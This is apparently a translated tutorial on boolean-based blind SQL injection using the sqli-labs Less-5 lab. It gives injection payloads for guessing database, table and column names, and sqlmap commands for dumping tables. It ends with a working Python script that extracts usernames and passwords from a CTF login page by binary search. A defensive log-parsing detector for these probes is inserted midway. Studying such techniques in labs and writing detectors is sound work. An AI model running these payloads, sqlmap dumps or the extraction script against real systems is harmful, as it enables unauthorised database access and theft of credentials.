Blind injection: the page does not return the result of a successful query and has no display position, so every fact has to be inferred from whether the page behaves as "true" or "false". Less-5 is used as the example.

Boolean-based blind injection

Guessing the database name:

```
?id=1' and length(database())=8-- -
?id=1' and left(database(),1)>'a'-- -
?id=1' and left(database(),1)>'z'-- -      the first character lies between a and z
?id=1' and left(database(),1)>'r'-- -
?id=1' and left(database(),1)>'s'-- -
?id=1' and left(database(),2)>'sa'-- -
```

Guessing table names:

```
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>111
```

In the general form `limit a,1),b,1))>n`, a is the table index counting from 0, b is the character position within the name, and n is the decimal ASCII value being compared against.

First table:

```
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101
```

Second table:

```
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=101
```

Checking the user table:

```
http://localhost/Tkitn/sqlitest/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='user' limit 0,1),1,1))>100 %23
```

Dumping the fields:

```
http://localhost/Tkitn/sqlitest/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20) FROM security.users ORDER BY id LIMIT 0,1),1,1))=68-- -
```
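The defender's view of the probes above, added here as an example that is not part of the original write-up: it parses access-log lines (assumed combined log format; the lines, IPs and threshold are constructed) and flags clients whose URL-decoded query strings carry the boolean-blind primitives shown on this page (length(database()), left(database(),n), ascii(substr(...)), ORD(MID(...)), information_schema lookups).

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample log lines (combined log format); the first client repeats
# the probe shapes from this page, the second issues ordinary requests.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-5/?id=1'%20and%20length(database())=8--%20- HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-5/?id=1'%20and%20left(database(),1)>'a'--%20- HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-5/?id=1'%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>111--%20- HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /Less-5/?id=1 HTTP/1.1" 200 612
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-5/?id=2 HTTP/1.1" 200 615
"""

# client IP and request path out of a combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

# The blind-injection primitives used on this page, matched on the URL-decoded
# path so %20 / + encoding does not hide them.
PROBE_RE = re.compile(
    r"length\(\s*database\(\)\s*\)"
    r"|left\(\s*database\(\)\s*,"
    r"|ascii\(\s*substr\("
    r"|ord\(\s*mid\("
    r"|information_schema\.(?:tables|columns)",
    re.IGNORECASE,
)

def is_blind_probe(request_path):
    """True if the decoded request path contains a boolean-blind primitive."""
    return PROBE_RE.search(unquote_plus(request_path)) is not None

def probes_per_client(log_text):
    """Count suspected blind-injection probes per source IP."""
    counts = Counter()
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_blind_probe(m.group(2)):
            counts[m.group(1)] += 1
    return counts

def flag_clients(log_text, threshold=3):
    """Clients at or above the threshold. Boolean-blind extraction needs several
    requests per recovered character, so even a low threshold is a strong signal."""
    return sorted(ip for ip, n in probes_per_client(log_text).items() if n >= threshold)

if __name__ == "__main__":
    print(flag_clients(SAMPLE_LOG))  # ['10.0.0.5']
```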
Using sqlmap

Basic usage:

```shell
python sqlmap.py -u "127.0.0.1/sqllabs/Less-5/?id=1"
python sqlmap.py -u "127.0.0.1/sqllabs/Less-5/?id=1" --tables -D security
```
Universal usage (running a captured request), suitable for POST-type injection

Capture the request in Burp and save it as 1.txt:

```shell
python sqlmap.py -r "1.txt"                                    # check whether the injection point is usable
python sqlmap.py -r "1.txt" -D <database>
python sqlmap.py -r "1.txt" -D <database> -T <table>
python sqlmap.py -r "1.txt" -D <database> -T <table> -C "username,realname,password"   # specify the columns to dump
```

-D is the database name, -T the table name. The dumped database contents are written to a log file saved locally.
Code comparison for Less-5 to Less-8: Less5, Less6, Less7, Less8. Extension: the complete list of sqlmap parameters.
Extension: binary-search blind injection script

```python
import requests
import time  # imported by the original script but never used

host = "http://web.jarvisoj.com:32787/login.php"

# The login page answers "用户名错误" (username error) exactly when the injected
# expression evaluates to 1, i.e. when the condition inside the XOR is true;
# that difference in the response text is the boolean oracle.
FALSE_MARKER = "用户名错误"


def extract(subquery, label, max_len=1000):
    """Recover the string returned by `subquery` one character at a time.

    For each position i, a binary search over the printable ASCII range
    (32-127) asks whether ascii(substr(subquery, i, 1)) < mid, using the
    payload shape 1'^(condition)^1# in the username field.
    """
    ans = ''
    for i in range(1, max_len):
        low, high = 32, 128
        mid = (low + high) // 2
        while low < high:
            payload = "1'^(ascii(substr((%s),%d,1))<%d)^1#" % (subquery, i, mid)
            param = {"username": payload, "password": "admin"}
            res = requests.post(host, data=param)
            if FALSE_MARKER in res.text:
                high = mid          # condition true: character < mid
            else:
                low = mid + 1       # condition false: character >= mid
            mid = (low + high) // 2
        if mid <= 32 or mid >= 127:
            break                   # no printable character here: end of string
        ans += chr(mid - 1)
        print(label + " is -> " + ans)
    return ans


def getDatabase():
    return extract("select(database())", "database")


def getTable():
    return extract(
        "select(group_concat(table_name))from(information_schema.tables)"
        "where(table_schema=database())",
        "table",
    )


def getColumn():
    return extract(
        "select(group_concat(column_name))from(information_schema.columns)"
        "where(table_name='admin')",
        "column",
    )


def dumpTable():
    return extract(
        "select(group_concat(username,0x3a,password))from(admin)",
        "dumpTable",
        max_len=10000,
    )


dumpTable()
```